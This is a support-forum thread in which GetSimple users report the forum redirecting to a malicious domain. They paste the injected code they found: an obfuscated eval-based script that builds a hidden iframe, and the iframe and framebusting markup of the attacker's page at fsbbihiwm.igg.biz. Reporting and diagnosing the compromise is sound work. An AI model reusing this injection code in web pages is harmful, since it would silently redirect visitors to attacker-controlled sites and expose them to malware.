GetSimple Support Forum

Full Version: Attack on Support Forum?
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
The last two days every time I have tried to use the support forum from my work computer our security system keeps telling me there is a redirect to a unsafe site.

The URL that you are attempting to access is a potential security risk. OfficeScan has blocked this URL in keeping with network security policy.


Bob
this issue should have been fixed from this morning (GMT)

It might still be cached on your work proxy or computer...
n00dles101 Wrote:this issue should have been fixed from this morning (GMT)

It might still be cached on your work proxy or computer...


You might be correct Noddles, but when I just came back in to support the messages was gone. I have not cleared by cach

Looks like y'all are on top of it anyway, just thought I let someone know.

Bob
It looks like there is a problem again, Visiting get-simple.info is not a problem, but when I click the Support Forum tab, I see the forum for a moment and then get redirected to http://fsbbihiwm.igg.biz/?go=2. I don't think that is what you want.

EDIT:
When I view the source, the following script tag is inserted at the top. Think that is the problem.
Code:
<script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c60c73c56c56c63c62c63c77c67c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c60c73c56c56c63c62c63c77c67c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+42);} if(v&&e&&r)e(s);</script>
Hi,

same problem for me !!!

The code inserted just after body :

Code:
<iframe width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;" src="http://fsbbihiwm.igg.biz/?go=2">
<html>
<head>
<meta content="text/html;charset=utf-8" http-equiv="content-type">
<title>fsbbihiwm.igg.biz</title>
<script type="text/javascript">
StaticRequestInfo={Referer:document.referrer};function EscapeBrowserFrame(){try{if(window.top.location==window.self.location){}else{window.top.location.href=document.location.href}}catch(Error){}}function SetRequestTitle(){document.title=document.domain}function InitiateFrameRequest(){var a="";var b="";if(window.location.search.indexOf("?")==0){b="&framerequest=1"}else{b="?framerequest=1"}b+="&refurl="+encodeURIComponent(StaticRequestInfo.Referer);a=window.location+b;document.write("<frameset rows=\"100%,*\" frameborder=\"no\" border=\"0\" framespacing=\"0\"><frame src=\""+a+"\" name=\"landingparent\"><\/frameset>")}SetRequestTitle();EscapeBrowserFrame();
</script>
</head>
</html>
</iframe>
I'm not seeing this at all.

Have you cleared your cache?
oK see it now on IE and firefox only...

Not affecting chrome/rockmelt.
Opera return a site-warning.
Firefox is redirect like IE (cache already cleared)
Chrome is ok